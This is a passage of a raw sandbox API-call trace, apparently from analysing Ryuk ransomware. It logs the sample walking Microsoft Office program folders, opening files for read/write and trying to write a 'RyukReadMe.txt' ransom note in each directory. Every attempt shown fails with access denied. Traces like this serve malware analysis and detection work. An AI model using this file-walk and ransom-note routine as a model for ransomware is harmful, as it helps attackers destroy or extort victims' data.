SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\AccessWeb\\CLNTWRAP.HTM", dwFileAttributes=0x80) returned 0 [0136.579] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\AccessWeb\\CLNTWRAP.HTM" (normalized: "c:\\program files\\microsoft office\\office14\\accessweb\\clntwrap.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.579] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.579] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.579] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.579] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.579] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\AccessWeb\\RPT2HTM4.XSL", dwFileAttributes=0x80) returned 0 [0136.579] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\AccessWeb\\RPT2HTM4.XSL" (normalized: "c:\\program files\\microsoft office\\office14\\accessweb\\rpt2htm4.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.579] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.579] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.579] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.579] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.580] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\AccessWeb\\SERVWRAP.ASP", dwFileAttributes=0x80) returned 0 [0136.580] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\AccessWeb\\SERVWRAP.ASP" (normalized: "c:\\program files\\microsoft office\\office14\\accessweb\\servwrap.asp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.580] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.580] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.580] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0136.580] FindClose (in: hFindFile=0x3bd480 | out: hFindFile=0x3bd480) returned 1 [0136.580] SetLastError (dwErrCode=0x0) [0136.580] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\AccessWeb\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\accessweb\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.580] GetLastError () returned 0x5 [0136.580] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0136.580] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.580] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.580] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.580] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.580] SetLastError (dwErrCode=0x0) [0136.580] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.581] GetLastError () returned 0x5 [0136.581] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0136.581] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.581] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3bd480 [0136.582] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.582] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.582] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.582] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZDAT12.ACCDU", dwFileAttributes=0x80) returned 0 [0136.583] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZDAT12.ACCDU" (normalized: "c:\\program files\\microsoft office\\office14\\accwiz\\acwzdat12.accdu"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.583] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.583] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.583] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.583] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.583] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZLIB.ACCDE", dwFileAttributes=0x80) returned 0 [0136.583] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZLIB.ACCDE" (normalized: "c:\\program files\\microsoft office\\office14\\accwiz\\acwzlib.accde"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.584] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.584] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.584] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.584] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.584] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE", dwFileAttributes=0x80) returned 0 [0136.584] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE" (normalized: "c:\\program files\\microsoft office\\office14\\accwiz\\acwzmain.accde"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.584] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.584] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.584] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.584] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.584] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZTOOL.ACCDE", dwFileAttributes=0x80) returned 0 [0136.585] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZTOOL.ACCDE" (normalized: "c:\\program files\\microsoft office\\office14\\accwiz\\acwztool.accde"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.585] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.585] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.585] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.585] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.585] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZUSR12.ACCDU", dwFileAttributes=0x80) returned 0 [0136.586] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZUSR12.ACCDU" (normalized: "c:\\program files\\microsoft office\\office14\\accwiz\\acwzusr12.accdu"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.586] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.586] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.586] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.586] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.586] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\UTILITY.ACCDA", dwFileAttributes=0x80) returned 0 [0136.587] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\UTILITY.ACCDA" (normalized: "c:\\program files\\microsoft office\\office14\\accwiz\\utility.accda"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.587] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.587] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.587] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0136.587] FindClose (in: hFindFile=0x3bd480 | out: hFindFile=0x3bd480) returned 1 [0136.588] SetLastError (dwErrCode=0x0) [0136.588] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\accwiz\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.590] GetLastError () returned 0x5 [0136.590] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0136.590] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.590] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.590] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.590] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.590] SetLastError (dwErrCode=0x0) [0136.590] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.590] GetLastError () returned 0x5 [0136.591] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0136.591] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.591] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3bd480 [0136.592] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.592] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.592] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.592] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.592] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.592] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.592] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\FAXEXT.ECF", dwFileAttributes=0x80) returned 0 [0136.593] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\FAXEXT.ECF" (normalized: "c:\\program files\\microsoft office\\office14\\addins\\faxext.ecf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.593] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.593] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.593] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.593] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.593] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.593] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\MSOSEC.XML", dwFileAttributes=0x80) returned 0 [0136.593] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\MSOSEC.XML" (normalized: "c:\\program files\\microsoft office\\office14\\addins\\msosec.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.594] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.594] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.594] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.594] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.594] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\MSSPC.ECF", dwFileAttributes=0x80) returned 0 [0136.594] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\MSSPC.ECF" (normalized: "c:\\program files\\microsoft office\\office14\\addins\\msspc.ecf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.594] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.594] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.594] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.594] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.594] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.595] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\OUTEX.ECF", dwFileAttributes=0x80) returned 0 [0136.595] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\OUTEX.ECF" (normalized: "c:\\program files\\microsoft office\\office14\\addins\\outex.ecf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.595] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.595] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.595] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.595] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.596] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\OUTEX2.ECF", dwFileAttributes=0x80) returned 0 [0136.596] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\OUTEX2.ECF" (normalized: "c:\\program files\\microsoft office\\office14\\addins\\outex2.ecf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.596] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.596] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.596] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.596] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.596] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.596] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\PMAILEXT.ECF", dwFileAttributes=0x80) returned 0 [0136.597] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\PMAILEXT.ECF" (normalized: "c:\\program files\\microsoft office\\office14\\addins\\pmailext.ecf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.597] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.597] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.597] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.597] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0136.597] FindClose (in: hFindFile=0x3bd480 | out: hFindFile=0x3bd480) returned 1 [0136.598] SetLastError (dwErrCode=0x0) [0136.598] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\addins\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.600] GetLastError () returned 0x5 [0136.600] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0136.601] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.601] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.601] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.601] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ADVCMP.DIC", dwFileAttributes=0x80) returned 0 [0136.601] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ADVCMP.DIC" (normalized: "c:\\program files\\microsoft office\\office14\\advcmp.dic"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.601] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.602] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.602] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.602] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.602] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ADVTEL.DIC", dwFileAttributes=0x80) returned 0 [0136.602] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ADVTEL.DIC" (normalized: "c:\\program files\\microsoft office\\office14\\advtel.dic"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.603] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.603] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.603] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.603] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.603] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ADVZIP.DIC", dwFileAttributes=0x80) returned 0 [0136.603] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ADVZIP.DIC" (normalized: "c:\\program files\\microsoft office\\office14\\advzip.dic"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.603] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.603] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.603] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.603] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.603] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.603] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.604] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ASCIIENG.LNG", dwFileAttributes=0x80) returned 0 [0136.604] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ASCIIENG.LNG" (normalized: "c:\\program files\\microsoft office\\office14\\asciieng.lng"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.604] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.604] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.604] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.604] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.604] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.604] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.604] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.604] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.604] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.604] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.604] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BCSClientManifest.man", dwFileAttributes=0x80) returned 0 [0136.606] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BCSClientManifest.man" (normalized: "c:\\program files\\microsoft office\\office14\\bcsclientmanifest.man"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.606] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.606] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.607] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.607] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.607] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BCSEvents.man", dwFileAttributes=0x80) returned 0 [0136.607] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BCSEvents.man" (normalized: "c:\\program files\\microsoft office\\office14\\bcsevents.man"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.607] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.607] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.607] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.607] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.607] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.607] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.607] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.607] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.607] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.607] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.607] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\bdcmetadata.xsd", dwFileAttributes=0x80) returned 0 [0136.608] CreateFileW 